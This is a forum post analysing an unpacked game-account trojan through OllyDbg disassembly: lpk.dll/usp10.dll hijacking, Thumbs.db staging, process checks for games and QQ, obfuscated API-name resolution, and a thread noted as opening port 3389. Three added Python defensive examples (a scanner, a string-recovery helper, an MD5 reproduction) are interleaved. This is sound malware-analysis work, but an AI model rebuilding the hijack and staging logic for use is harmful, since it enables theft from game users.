[Original] Analysis of a trojan; please offer your guidance so I can improve my analysis

Posted on: 2011-10-15 23:58 7235

After unpacking:
10015DE8 8BFF mov edi, edi // OEP (entry point)
10015DEA 55 push ebp
10015DEB 8BEC mov ebp, esp
10015DED 837D 0C 01 cmp dword ptr [ebp+C], 1
10015DF1 75 05 jnz short 10015DF8
10015DF3 E8 56780000 call 1001D64E
10015DF8 FF75 08 push dword ptr [ebp+8]
10015DFB 8B4D 10 mov ecx, dword ptr [ebp+10]
10015DFE 8B55 0C mov edx, dword ptr [ebp+C]
10015E01 E8 ECFEFFFF call 10015CF2 ; key call
10015E06 59 pop ecx
10015E07 5D pop ebp
10015E08 C2 0C00 retn 0C
10009916 FF75 08 push dword ptr [ebp+8]
10009919 FF15 A4200210 call dword ptr [100220A4] ; kernel32.DisableThreadLibraryCalls
1000991F 6A 37 push 37
10009921 68 B4250210 push 100225B4 ; ASCII "LpkEditControl"
10009926 E8 1C81FFFF call 10001A47 ; LpkEditControl is an array holding a set of functions; this builds the lpk
By hijacking the system file lpk.dll, the malware makes the game load the malicious lpk.dll from the game directory first.
100019F4 E8 37030100 call 10011D30 // calls lpk
100019F9 83C4 0C add esp, 0C
100019FC 56 push esi
100019FD 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A03 50 push eax
10001A04 FF15 48200210 call dword ptr [10022048] ; kernel32.GetSystemDirectoryA
10001A0A 68 54250210 push 10022554 ; ASCII "\lpk.dll"
10001A0F 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A15 50 push eax
10001A16 FF15 44200210 call dword ptr [10022044] ; kernel32.lstrcatA
10001A1C 833D 1C170310 00 cmp dword ptr [1003171C], 0
10001A23 5E pop esi
10001A24 75 12 jnz short 10001A38
10001A26 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
10001A2C 50 push eax
10001A2D FF15 38200210 call dword ptr [10022038] ; kernel32.LoadLibraryA
Loads usp10 and lpk from the file's own directory
10009A4A 68 B03B0210 push 10023BB0 ; ASCII "%s\Thumbs.db"
10009A4F 68 18160310 push 10031618 ; ASCII "e:\ollyice\Thumbs.db"
10009A54 E8 6D9D0000 call 100137C6 ; joins the current path with this file name
10009A59 53 push ebx
10009A5A 68 A03B0210 push 10023BA0 ; ASCII "%s\Usp10.dll"
10009A5F BF C0110310 mov edi, 100311C0 ; ASCII "e:\ollyice\Usp10.dll"
10009A64 57 push edi
10009A65 E8 5C9D0000 call 100137C6
10009A6A 53 push ebx
10009A6B 68 402F0210 push 10022F40 ; ASCII "%s\Lpk.dll"
10009A70 56 push esi
10009A71 E8 509D0000 call 100137C6
10009A76 83C4 24 add esp, 24
10009A79 FF15 5C200210 call dword ptr [1002205C] ; kernel32.GetTickCount
10009A7F 53 push ebx
10009A80 A8 01 test al, 1
10009A82 75 12 jnz short 10009A96
10009A84 68 402F0210 push 10022F40 ; ASCII "%s\Lpk.dll"
10009A89 BB A0C00210 mov ebx, 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009A8E 53 push ebx
10009A8F E8 329D0000 call 100137C6
10009A94 EB 14 jmp short 10009AAA
10009A96 68 A03B0210 push 10023BA0 ; ASCII "%s\Usp10.dll"
10009A9B 68 A0C00210 push 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009AA0 E8 219D0000 call 100137C6
10009AA5 BB A0C00210 mov ebx, 1002C0A0 ; ASCII "e:\ollyice\Usp10.dll"
10009AAA 83C4 0C add esp, 0C
10009AAD 57 push edi
10009AAE FF15 84200210 call dword ptr [10022084] ; kernel32.GetFileAttributesA
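The path-building code above shows the hijack's footprint on disk: a Lpk.dll or Usp10.dll placed beside the host program, with Thumbs.db used for a staged copy. The following Python scanner is an added example (it is not from the original post or the sample) that hunts for that footprint: it walks a directory tree, flags lpk.dll/usp10.dll copies whose MD5 differs from a reference hash of the genuine system copy, and flags any Thumbs.db that starts with a PE "MZ" header. The reference hash, the temporary directory and the file bodies in `demo()` are constructed for the demonstration; the reference hash is assumed to be collected separately from the real system directory.

```python
import hashlib
import os
from pathlib import Path

# Names the sample plants beside the host program (from the listing:
# "%s\Lpk.dll", "%s\Usp10.dll") and the file it stages a copy in ("%s\Thumbs.db").
HIJACK_NAMES = {"lpk.dll", "usp10.dll"}
STAGING_NAMES = {"thumbs.db"}


def is_pe(path):
    """True if the file starts with the 'MZ' DOS header.
    A genuine Thumbs.db is an OLE compound file and never starts with MZ."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def md5_hex(path):
    """Lower-case 32-character MD5 of a file, the form the sample itself compares."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, system_hashes):
    """Walk `root` and return [(path, reason), ...] for files matching the hijack pattern.
    `system_hashes` maps a lower-case DLL name to the MD5 of the genuine copy in the
    system directory (assumed to be gathered beforehand, e.g. from %SystemRoot%\\system32)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            lower = name.lower()
            if lower in HIJACK_NAMES:
                genuine = system_hashes.get(lower)
                if genuine is None:
                    findings.append((str(path), "hijack DLL name outside system dir; no reference hash"))
                elif md5_hex(path) != genuine:
                    findings.append((str(path), "hijack DLL name outside system dir; hash differs from system copy"))
                # identical hash: a stray but unmodified copy, not reported
            elif lower in STAGING_NAMES and is_pe(path):
                findings.append((str(path), "Thumbs.db is a PE image (staged DLL copy)"))
    return findings


def demo():
    """Run the scanner on a constructed directory tree; returns sorted (name, reason) pairs."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        game = Path(tmp) / "game"
        game.mkdir()
        fake_dll = b"MZ" + b"\x00" * 62 + b"constructed fake dll body"
        (game / "Lpk.dll").write_bytes(fake_dll)          # constructed planted DLL
        (game / "Thumbs.db").write_bytes(fake_dll)        # constructed staged copy
        (game / "cover.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed jpeg")  # benign
        # constructed reference hash for a "genuine" lpk.dll that differs from the planted one
        genuine = hashlib.md5(b"MZ constructed genuine system lpk.dll").hexdigest()
        findings = scan_tree(tmp, {"lpk.dll": genuine})
    return sorted((Path(p).name.lower(), reason) for p, reason in findings)


if __name__ == "__main__":
    for name, reason in demo():
        print(name, "->", reason)
```

The scanner deliberately stays quiet on a copy whose hash equals the system one, since a vendor sometimes ships an unmodified redistributable next to its program; only a differing or unknown copy in a non-system directory is reported.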
Creates a thread running thread function 1 at address 10009678
10009B0D E8 97B10000 call 10014CA9
10009B12 59 pop ecx
10009B13 59 pop ecx
10009B14 33C0 xor eax, eax
10009B16 50 push eax
10009B17 50 push eax
10009B18 50 push eax
10009B19 68 78960010 push 10009678 ; thread function 1
10009B1E 50 push eax
10009B1F 50 push eax
10009B20 FF15 94200210 call dword ptr [10022094] ; kernel32.CreateThread
Thread function 1:
10009678 /. 55 push ebp ; thread function 1
10009679 |. 8BEC mov ebp, esp
1000967B |. 81EC 94010000 sub esp, 194
10009681 |. A1 60B00210 mov eax, dword ptr [1002B060]
10009686 |. 33C5 xor eax, ebp
10009688 |. 8945 FC mov [local.1], eax
1000968B |. 53 push ebx
1000968C |. 56 push esi
1000968D |. 57 push edi
1000968E |. E8 657DFFFF call 100013F8 ; dynamically loads libraries and resolves the addresses of the functions it uses; key call 1
10009693 |. 8D85 6CFEFFFF lea eax, [local.101]
10009699 |. 50 push eax
1000969A |. 33F6 xor esi, esi
1000969C |. 68 02020000 push 202
100096A1 |. 8935 78170310 mov dword ptr [10031778], esi
100096A7 |. 8935 74170310 mov dword ptr [10031774], esi
100096AD |. FF15 F4F70210 call dword ptr [1002F7F4] ; ws2_32.WSAStartup
100096B3 |. BB 00010000 mov ebx, 100
100096B8 |. 53 push ebx
100096B9 |. 56 push esi
100096BA |. BF E0C10210 mov edi, 1002C1E0 ; ASCII "c06a104c7ee76da815861809b2cf7925"
100096BF |. 57 push edi
100096C0 |. E8 6B860000 call <clear memory block>
100096C5 |. 53 push ebx
100096C6 |. 56 push esi
100096C7 |. BB F8120310 mov ebx, 100312F8 ; ASCII "d41d8cd98f00b204e9800998ecf8427e"
100096CC |. 53 push ebx
100096CD |. E8 5E860000 call <clear memory block>
100096D2 |. 68 04010000 push 104
100096D7 |. 56 push esi
100096D8 |. 68 78DC0210 push 1002DC78
100096DD |. E8 4E860000 call <clear memory block>
100096E2 |. 57 push edi
100096E3 |. 68 50C50210 push 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
100096E8 |. E8 EA8FFFFF call <compute 32-char string>
100096ED |. 53 push ebx
100096EE |. 68 A0C00210 push 1002C0A0 ; ASCII "d:\tools\ollyice\Lpk.dll"
100096F3 |. E8 DF8FFFFF call <compute 32-char string> ; computes the 32-char string for "d:\tools\ollyice\Lpk.dll"
100096F8 |. 68 603B0210 push 10023B60 ; d41d8cd98f00b204e9800998ecf8427e
100096FD |. 57 push edi ; passes the other 32-char string saved earlier in edi, here at 1002c1e0
100096FE |. E8 4DB20000 call <string compare>
10009703 |. 83C4 3C add esp, 3C
10009706 |. BE 18160310 mov esi, 10031618 ; ASCII "d:\tools\ollyice\Thumbs.db"
1000970B |. 85C0 test eax, eax
1000970D |. 75 3B jnz short 1000974A ; if equal, fall through; if different, jump
1000970F |. 56 push esi
10009710 |. E8 00B20000 call <delete file>
10009715 |. 59 pop ecx
10009716 |. 6A 01 push 1
10009718 |. 56 push esi
10009719 |. 68 50C50210 push 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
1000971E |. FF15 5C140310 call dword ptr [1003145C] ; kernel32.CopyFileA
10009724 |. 6A 00 push 0
10009726 |. 56 push esi
10009727 |. FF15 B4110310 call dword ptr [100311B4] ; kernel32.SetFileAttributesA
1000972D |. 68 00010000 push 100
10009732 |. 6A 00 push 0
10009734 |. 57 push edi
10009735 |. E8 F6850000 call <clear memory block>
1000973A |. 57 push edi
1000973B |. 56 push esi
1000973C |. E8 968FFFFF call <compute 32-char string>
10009741 |. 56 push esi
10009742 |. E8 CEB10000 call <delete file>
10009747 |. 83C4 18 add esp, 18
1000974A |> 68 603B0210 push 10023B60 ; d41d8cd98f00b204e9800998ecf8427e
1000974F |. 53 push ebx
10009750 |. E8 FBB10000 call <string compare>
10009755 |. 59 pop ecx
10009756 |. 59 pop ecx
10009757 |. 85C0 test eax, eax
10009759 |. 75 3D jnz short 10009798
1000975B |. 56 push esi
1000975C |. E8 B4B10000 call <delete file>
10009761 |. 59 pop ecx
10009762 |. 6A 01 push 1
10009764 |. 56 push esi
10009765 |. 68 A0C00210 push 1002C0A0 ; ASCII "d:\tools\ollyice\Lpk.dll"
1000976A |. FF15 5C140310 call dword ptr [1003145C] ; kernel32.CopyFileA copies lpk.dll to thumbs.db
10009770 |. 33FF xor edi, edi
10009772 |. 57 push edi
10009773 |. 56 push esi
10009774 |. FF15 B4110310 call dword ptr [100311B4] ; kernel32.SetFileAttributesA
1000977A |. 68 00010000 push 100
1000977F |. 57 push edi
10009780 |. 53 push ebx
10009781 |. E8 AA850000 call <clear memory block>
10009786 |. 53 push ebx
10009787 |. 56 push esi
10009788 |. E8 4A8FFFFF call <compute 32-char string>
1000978D |. 56 push esi
1000978E |. E8 82B10000 call <delete file>
10009793 |. 83C4 18 add esp, 18
10009796 |. EB 02 jmp short 1000979A
10009798 |> 33FF xor edi, edi
1000979A |> 68 583B0210 push 10023B58 ; dnf.exed41d8cd98f00b204e9800998ecf8427e
1000979F |. BE 50C50210 mov esi, 1002C550 ; ASCII "d:\tools\ollyice\loaddll.exe"
100097A4 |. 56 push esi
100097A5 |. E8 969F0000 call <compare> ; checks whether the current process is Dungeon & Fighter (dnf.exe)
100097AA |. 68 483B0210 push 10023B48 ; iexplore.exe
100097AF |. 56 push esi ; d:\tools\ollyice\loaddll.exe
100097B0 |. E8 8B9F0000 call <compare>
100097B5 |. 83C4 10 add esp, 10
100097B8 |. 85C0 test eax, eax
100097BA |. 0F85 2D010000 jnz 100098ED ; if not an IE process, continue; if it is, jump
100097C0 |. 57 push edi
100097C1 |. 57 push edi
100097C2 |. 57 push edi
100097C3 |. 68 00500010 push 10005000 ; thread 2
100097C8 |. 57 push edi
100097C9 |. 57 push edi
100097CA |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
100097D0 |. 50 push eax
100097D1 |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
100097D7 |. 6A 64 push 64
100097D9 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100097DF |. 68 403B0210 push 10023B40 ; qq.exe
100097E4 |. 56 push esi
100097E5 |. E8 569F0000 call <compare> ; // checks for the QQ process
100097EA |. 59 pop ecx
100097EB |. 59 pop ecx
100097EC |. 85C0 test eax, eax
100097EE |. 0F85 F9000000 jnz 100098ED
100097F4 |. 68 78360210 push 10023678 ; explorer.exe
100097F9 |. 56 push esi
100097FA |. E8 419F0000 call <compare>
100097FF |. 59 pop ecx
10009800 |. 59 pop ecx
10009801 |. 85C0 test eax, eax
10009803 |. 0F85 E4000000 jnz 100098ED
10009809 |. 68 D03A0210 push 10023AD0 ; wow.exews2_32.dll
1000980E |. 56 push esi
1000980F |. E8 2C9F0000 call <compare>
10009814 |. 59 pop ecx
10009815 |. 59 pop ecx
10009816 |. 85C0 test eax, eax
10009818 |. 74 1C je short 10009836 // if it is World of Warcraft, continue; otherwise jump
1000981A |. 57 push edi
1000981B |. 57 push edi
1000981C |. 57 push edi
1000981D |. 68 25930010 push 10009325 ; thread 3
10009822 |. 57 push edi
10009823 |. 57 push edi
10009824 |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
1000982A |. 50 push eax
1000982B |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
10009831 |. E9 B7000000 jmp 100098ED
10009836 |> 68 0C3B0210 push 10023B0C ; xlauncher.exe
1000983B |. 56 push esi
1000983C |. E8 FF9E0000 call <compare>
10009841 |. 59 pop ecx
10009842 |. 59 pop ecx
10009843 |. 85C0 test eax, eax
10009845 |. 0F85 A2000000 jnz 100098ED
1000984B |. 68 403A0210 push 10023A40 ; mir1.dat
10009850 |. 56 push esi
10009851 |. E8 EA9E0000 call <compare>
10009856 |. 59 pop ecx
10009857 |. 59 pop ecx
10009858 |. 85C0 test eax, eax
1000985A |. 0F85 8D000000 jnz 100098ED
10009860 |. 68 343A0210 push 10023A34 ; mir2.dat
10009865 |. 56 push esi
10009866 |. E8 D59E0000 call <compare>
1000986B |. 59 pop ecx
1000986C |. 59 pop ecx
1000986D |. 85C0 test eax, eax
1000986F |. 75 7C jnz short 100098ED
10009871 |. 68 283A0210 push 10023A28 ; mir3.dat
10009876 |. 56 push esi
10009877 |. E8 C49E0000 call <compare>
1000987C |. 59 pop ecx
1000987D |. 59 pop ecx
1000987E |. 85C0 test eax, eax
10009880 |. 75 6B jnz short 100098ED
10009882 |. 68 1C3A0210 push 10023A1C ; mir4.dat
10009887 |. 56 push esi
10009888 |. E8 B39E0000 call <compare>
1000988D |. 59 pop ecx
1000988E |. 59 pop ecx
1000988F |. 85C0 test eax, eax
10009891 |. 75 5A jnz short 100098ED
10009893 |. 68 4C3A0210 push 10023A4C ; mir.exeyx=ftp&ss=%s
10009898 |. 56 push esi
10009899 |. E8 A29E0000 call <compare>
1000989E |. 59 pop ecx
1000989F |. 59 pop ecx
100098A0 |. 85C0 test eax, eax
100098A2 |. 75 49 jnz short 100098ED
100098A4 |. 68 5C300210 push 1002305C ; winhlp32.exe
100098A9 |. 56 push esi
100098AA |. E8 919E0000 call <compare>
100098AF |. 59 pop ecx
100098B0 |. 59 pop ecx
100098B1 |. 85C0 test eax, eax
100098B3 |. 74 2E je short 100098E3
100098B5 |. 57 push edi
100098B6 |. 57 push edi
100098B7 |. 57 push edi
100098B8 |. 68 476A0010 push 10006A47 ; thread 4
100098BD |. 57 push edi
100098BE |. 57 push edi
100098BF |. FF15 5CC70210 call dword ptr [1002C75C] ; kernel32.CreateThread
100098C5 |. 50 push eax
100098C6 |. FF15 8C100310 call dword ptr [1003108C] ; kernel32.CloseHandle
100098CC |. 68 F4010000 push 1F4
100098D1 |. FF15 7CDD0210 call dword ptr [1002DD7C] ; kernel32.Sleep
100098D7 |. C705 5C170310 0>mov dword ptr [1003175C], 0B
100098E1 |. EB 0A jmp short 100098ED
100098E3 |> E8 038CFFFF call 100024EB
100098E8 |. E8 54FDFFFF call 10009641
100098ED |> 8B4D FC mov ecx, [local.1]
100098F0 |. 5F pop edi
100098F1 |. 5E pop esi
100098F2 |. 33CD xor ecx, ebp
100098F4 |. 5B pop ebx
100098F5 |. E8 509F0000 call 1001384A
100098FA |. C9 leave
100098FB \. C3 retn
Key call 1: dynamically resolves the API functions it calls
100013F8 /$ 55 push ebp
100013F9 |. 8BEC mov ebp, esp
100013FB |. 83EC 18 sub esp, 18
100013FE |. A1 60B00210 mov eax, dword ptr [1002B060]
10001403 |. 33C5 xor eax, ebp
10001405 |. 8945 FC mov [local.1], eax
10001408 |. 53 push ebx
10001409 |. 56 push esi // dynamic resolution
1000140A |. 8B35 38200210 mov esi, dword ptr [10022038] ; kernel32.LoadLibraryA
10001410 |. 57 push edi
10001411 |. 68 48250210 push 10022548 ; /TextOutA
10001416 |. 68 40250210 push 10022540 ; |/GDI32
1000141B |. FFD6 call esi ; |\LoadLibraryA
1000141D |. 8B3D 34200210 mov edi, dword ptr [10022034] ; |kernel32.GetProcAddress
10001423 |. 50 push eax ; |hModule
10001424 |. FFD7 call edi ; \GetProcAddress
10001426 |. 68 30250210 push 10022530 ; /CoInitialize
1000142B |. BB 28250210 mov ebx, 10022528 ; |ole32
10001430 |. 53 push ebx ; |/FileName => "ole32"
10001431 |. A3 F0140310 mov dword ptr [100314F0], eax ; ||
10001436 |. FFD6 call esi ; |\LoadLibraryA
10001438 |. 50 push eax ; |hModule
10001439 |. FFD7 call edi ; \GetProcAddress
1000143B |. 68 18250210 push 10022518 ; /CoUninitialize
10001440 |. 53 push ebx ; |/FileName => "ole32"
10001441 |. A3 B8110310 mov dword ptr [100311B8], eax ; ||
10001446 |. FFD6 call esi ; |\LoadLibraryA
10001448 |. 50 push eax ; |hModule
10001449 |. FFD7 call edi ; \GetProcAddress
1000144B |. 68 04250210 push 10022504 ; /CoCreateInstance
10001450 |. 53 push ebx ; |/FileName => "ole32"
10001451 |. A3 0C160310 mov dword ptr [1003160C], eax ; ||
10001456 |. FFD6 call esi ; |\LoadLibraryA
10001458 |. 50 push eax ; |hModule
10001459 |. FFD7 call edi ; \GetProcAddress
1000145B |. 68 F0240210 push 100224F0 ; /GetForegroundWindowCoCreateInstance
10001460 |. 68 E8240210 push 100224E8 ; |/user32
10001465 |. A3 80100310 mov dword ptr [10031080], eax ; ||
1000146A |. FFD6 call esi ; |\LoadLibraryA
1000146C |. 50 push eax ; |hModule
1000146D |. FFD7 call edi ; \GetProcAddress
1000146F |. 6A 14 push 14
10001471 |. A3 B0110310 mov dword ptr [100311B0], eax
10001476 |. 8D45 E8 lea eax, [local.6]
10001479 |. 6A 00 push 0
1000147B |. 50 push eax
1000147C |. E8 AF080100 call 10011D30
10001481 |. 68 E0240210 push 100224E0 ; rnel3
10001486 |. 8D45 E8 lea eax, [local.6]
10001489 |. 68 D8240210 push 100224D8 ; ke%s2
1000148E |. 50 push eax
1000148F |. E8 32230100 call <string handler>
10001494 |. 83C4 18 add esp, 18
10001497 |. 68 C4240210 push 100224C4 ; RemoveDirectoryA
1000149C |. 8D45 E8 lea eax, [local.6]
1000149F |. 50 push eax ; // dynamically calls LoadLibraryA
100014A0 |. FFD6 call esi ; kernel32.LoadLibraryA
100014A2 |. 50 push eax // saves the returned address
100014A3 |. FFD7 call edi ; kernel32.GetProcAddress
100014A5 |. 68 B0240210 push 100224B0 ; VirtualProtectEx
100014AA |. BB A4240210 mov ebx, 100224A4 ; kernel32
100014AF |. 53 push ebx
100014B0 |. A3 BC100310 mov dword ptr [100310BC], eax
100014B5 |. FFD6 call esi ; kernel32.LoadLibraryA
100014B7 |. 50 push eax
100014B8 |. FFD7 call edi
100014BA |. 68 98240210 push 10022498 ; WriteFile
100014BF |. 53 push ebx
100014C0 |. A3 8C020310 mov dword ptr [1003028C], eax
100014C5 |. FFD6 call esi
100014C7 |. 50 push eax
100014C8 |. FFD7 call edi
100014CA |. 68 8C240210 push 1002248C ; GetFileSizeWriteFile
100014CF |. 53 push ebx
100014D0 |. A3 E8C20210 mov dword ptr [1002C2E8], eax
100014D5 |. FFD6 call esi
100014D7 |. 50 push eax
100014D8 |. FFD7 call edi
100014DA |. 68 78240210 push 10022478 ; GetShortPathNameA
100014DF |. 53 push ebx ; // gets the file's short path
100014E0 |. A3 E8140310 mov dword ptr [100314E8], eax
100014E5 |. FFD6 call esi
100014E7 |. 50 push eax
100014E8 |. FFD7 call edi
100014EA |. 68 68240210 push 10022468 ; GetTempPathA
Resolving the addresses of send, recv, connect and similar functions
10001681 |. E8 AA060100 call <clear memory block>
10001686 |. 68 F4220210 push 100222F4 ; en
1000168B |. 8D45 E8 lea eax, [local.6]
1000168E |. 68 EC220210 push 100222EC ; s%sd
10001693 |. 50 push eax
10001694 |. E8 2D210100 call <string handler> ; // builds the string "send", stored at address 008afdf4
10001699 |. 83C4 18 add esp, 18
1000169C |. 8D45 E8 lea eax, [local.6]
1000169F |. 50 push eax ; // this address holds the string "send"
100016A0 |. 53 push ebx
100016A1 |. FFD6 call esi ; LoadLibraryA
100016A3 |. 50 push eax
100016A4 |. FFD7 call edi ; // GetProcAddress resolves the address of send
100016A6 |. A3 DC020310 mov dword ptr [100302DC], eax
100016AB |. 6A 14 push 14
100016AD |. 8D45 E8 lea eax, [local.6]
100016B0 |. 6A 00 push 0
100016B2 |. 50 push eax
100016B3 |. E8 78060100 call <clear memory block>
100016B8 |. 68 E8220210 push 100222E8 ; ec
100016BD |. 8D45 E8 lea eax, [local.6]
100016C0 |. 68 E0220210 push 100222E0 ; r%sv
100016C5 |. 50 push eax
100016C6 |. E8 FB200100 call <string handler>
100016CB |. 83C4 18 add esp, 18
100016CE |. 8D45 E8 lea eax, [local.6] ; // yields "recv"
100016D1 |. 50 push eax
100016D2 |. 53 push ebx
100016D3 |. FFD6 call esi
100016D5 |. 50 push eax
100016D6 |. FFD7 call edi
100016D8 |. 68 D4220210 push 100222D4 ; //gethostnamer%sv
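The two listings above show how the sample keeps API names out of its string table: "ke%s2" with "rnel3" yields "kernel32", "s%sd" with "en" yields "send", and "r%sv" with "ec" yields "recv", each assembled by a sprintf-style call just before LoadLibraryA/GetProcAddress. The following Python is an added example, not code from the original post or the sample: it rebuilds the names from the pairs visible in the listing and shows a triage check that tries every one-`%s` format against every short literal in a (constructed) string table, so a `strings`-only pass does not miss the names. The watchlist and the sample string table are assumptions for the demonstration.

```python
# (format string, fragment) pairs exactly as they appear in the listing above.
# The sample passes each pair to a sprintf-style routine, so the API name never
# exists as one contiguous string in the binary.
OBSERVED_PAIRS = [("ke%s2", "rnel3"), ("s%sd", "en"), ("r%sv", "ec")]

# Names worth a second look when they are assembled at runtime (assumed watchlist).
WATCHLIST = {"kernel32", "send", "recv", "connect", "gethostname",
             "LoadLibraryA", "GetProcAddress", "VirtualProtectEx", "WriteFile"}

# Constructed string table standing in for the output of a strings tool.
SAMPLE_STRINGS = ["ke%s2", "rnel3", "s%sd", "en", "r%sv", "ec",
                  "%02x", "Path", "%s\\Lpk.dll", "3389:TCP"]


def rebuild(fmt, fragment):
    """Equivalent of sprintf(buf, fmt, fragment) for a format with exactly one %s."""
    if fmt.count("%s") != 1 or fmt.count("%") != 1:
        raise ValueError("expected exactly one %s in the format string")
    return fmt.replace("%s", fragment)


def recover_names(pairs):
    """Rebuild every (format, fragment) pair in listing order."""
    return [rebuild(fmt, frag) for fmt, frag in pairs]


def flag_split_strings(strings, watchlist=WATCHLIST, max_fmt=12, max_frag=8):
    """Triage helper: pair every short one-%s format with every short literal and
    report rebuilt names that are on the watchlist. Quadratic, but string tables
    are small and the length caps keep the candidate set tight."""
    fmts = [s for s in strings
            if s.count("%s") == 1 and s.count("%") == 1 and len(s) <= max_fmt]
    frags = [s for s in strings if "%" not in s and 1 <= len(s) <= max_frag]
    hits = set()
    for fmt in fmts:
        for frag in frags:
            name = rebuild(fmt, frag)
            if name in watchlist:
                hits.add(name)
    return sorted(hits)


if __name__ == "__main__":
    print("rebuilt from listing:", recover_names(OBSERVED_PAIRS))
    print("watchlist hits in string table:", flag_split_strings(SAMPLE_STRINGS))
```

The pairing heuristic produces false positives on large string tables (any two fragments that happen to spell a watched name), so it is a pointer for where to set breakpoints on the format routine, not a verdict on its own.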
The function that actually computes the 32-char string:
100027A9 |> /0FB64435 E0 /movzx eax, byte ptr [ebp+esi-20]
100027AE |. |50 |push eax
100027AF |. |68 1C2A0210 |push 10022A1C ; %02x
100027B4 |. |57 |push edi
100027B5 |. |E8 0C100100 |call <string handler>
100027BA |. |83C4 0C |add esp, 0C
100027BD |. |46 |inc esi
100027BE |. |83C7 02 |add edi, 2
100027C1 |. |83FE 10 |cmp esi, 10
100027C4 |.^\7C E3 \jl short 100027A9
Memory state:
1002C1D4 00 00 00 00 00 00 00 00 00 00 00 00 63 30 36 61 ............c06a
1002C1E4 31 30 34 63 37 65 65 37 36 64 61 38 31 35 38 36 104c7ee76da81586
1002C1F4 31 38 30 39 62 32 63 66 37 39 32 35 1809b2cf7925
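The loop at 100027A9 renders 16 bytes with "%02x" into a 32-character buffer, which is the textual form of an MD5 digest; the constant the thread compares against, d41d8cd98f00b204e9800998ecf8427e, is the MD5 of zero bytes of input, so a match means nothing was hashed. The following Python is an added example (not from the original post or the sample) that reproduces the rendering loop and the empty-digest check so the comparison in thread function 1 can be reasoned about; the MD5 interpretation of the 16-byte input is an inference from the constant, stated as such in the comments.

```python
import hashlib

# MD5 of zero bytes of input. This is the constant at 10023B60 that the sample
# compares its computed string against.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"


def digest_to_hex(digest16):
    """Reproduce the loop at 100027A9: for esi = 0..0x0F, sprintf(edi, "%02x",
    byte[esi]) and advance edi by 2, producing a 32-character lower-case string."""
    if len(digest16) != 16:
        raise ValueError("expected a 16-byte digest")
    out = ""
    for b in digest16:
        out += "%02x" % b
    return out


def file_fingerprint(data):
    """32-char string for a file's contents: MD5 digest rendered by digest_to_hex.
    (MD5 is inferred from the empty-input constant the sample compares against.)"""
    return digest_to_hex(hashlib.md5(data).digest())


def classify(fingerprint):
    """Interpret a fingerprint the way the comparison in thread function 1 does:
    the empty-input digest means nothing was hashed (file empty, missing or unreadable)."""
    return "empty-or-unreadable" if fingerprint.lower() == EMPTY_MD5 else "has-content"


def fingerprints_match(a, b):
    """Case-insensitive compare; the sample's buffer is lower-case hex."""
    return a.lower() == b.lower()


if __name__ == "__main__":
    # constructed inputs
    for sample in (b"", b"abc", b"MZ constructed dll body"):
        fp = file_fingerprint(sample)
        print(fp, classify(fp))
```

For an analyst the practical point is that the branch taken after the comparison tells you whether the sample believed its target file was absent or empty, which is worth knowing before deciding what the CopyFileA / DeleteFileA sequence that follows actually did on the victim.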
Delete-file function:
10014915 <4b>/$ 8BFF mov edi, edi
10014917 |. 55 push ebp
10014918 |. 8BEC mov ebp, esp
1001491A |. FF75 08 push [arg.1] ; /FileName = "d:\tools\ollyice\Thumbs.db"
1001491D |. FF15 64200210 call dword ptr [10022064] ; \DeleteFileA
10014923 |. 85C0 test eax, eax
10014925 |. 75 08 jnz short 1001492F
10014927 |. FF15 88200210 call dword ptr [10022088] ; ntdll.RtlGetLastWin32Error
1001492D |. EB 02 jmp short 10014931
1001492F |> 33C0 xor eax, eax
10014931 |> 85C0 test eax, eax
10014933 |. 74 0C je short 10014941
10014935 |. 50 push eax
10014936 |. E8 2F260000 call 10016F6A
1001493B |. 59 pop ecx
1001493C |. 83C8 FF or eax, FFFFFFFF
1001493F |. 5D pop ebp
10014940 |. C3 retn
10014941 |> 33C0 xor eax, eax
10014943 |. 5D pop ebp
10014944 \. C3 retn
Thread 2: registry operations, opening port 3389, and so on.
10005000 /. 55 push ebp
10005001 |. 8BEC mov ebp, esp
10005003 |. 81EC D8070000 sub esp, 7D8
10005009 |. A1 60B00210 mov eax, dword ptr [1002B060]
1000500E |. 33C5 xor eax, ebp
10005010 |. 8945 FC mov [local.1], eax
10005013 |. 53 push ebx
10005014 |. 56 push esi
10005015 |. 57 push edi
10005016 |. 6A 32 push 32
10005018 |. 33FF xor edi, edi
1000501A |. 57 push edi
1000501B |. BE A4020310 mov esi, 100302A4 ; ASCII "PC2010111223fpr"
10005020 |. 56 push esi
10005021 |. E8 0ACD0000 call <clear memory block>
10005026 |. 83C4 0C add esp, 0C
10005029 |. 6A 1E push 1E
1000502B |. 56 push esi
1000502C |. FF15 18020310 call dword ptr [10030218] ; ws2_32.gethostname
10005032 |. BB 04010000 mov ebx, 104 ; hostname:PC2010111223fpr
10005037 |. 53 push ebx
10005038 |. 8D85 CCFEFFFF lea eax, [local.77]
1000503E |. 57 push edi
1000503F |. 50 push eax
10005040 |. E8 EBCC0000 call <clear memory block>
10005045 |. 83C4 0C add esp, 0C
10005048 |. 68 00010000 push 100 ; /BufSize = 100 (256.)
1000504D |. 8D85 CCFEFFFF lea eax, [local.77] ; |
10005053 |. 50 push eax ; |Buffer
10005054 |. FF15 54200210 call dword ptr [10022054] ; \GetWindowsDirectoryA
1000505A |. 53 push ebx
1000505B |. 8D85 40F9FFFF lea eax, [local.432]
10005061 |. 57 push edi
10005062 |. 50 push eax
10005063 |. E8 C8CC0000 call <clear memory block>
10005068 |. 53 push ebx
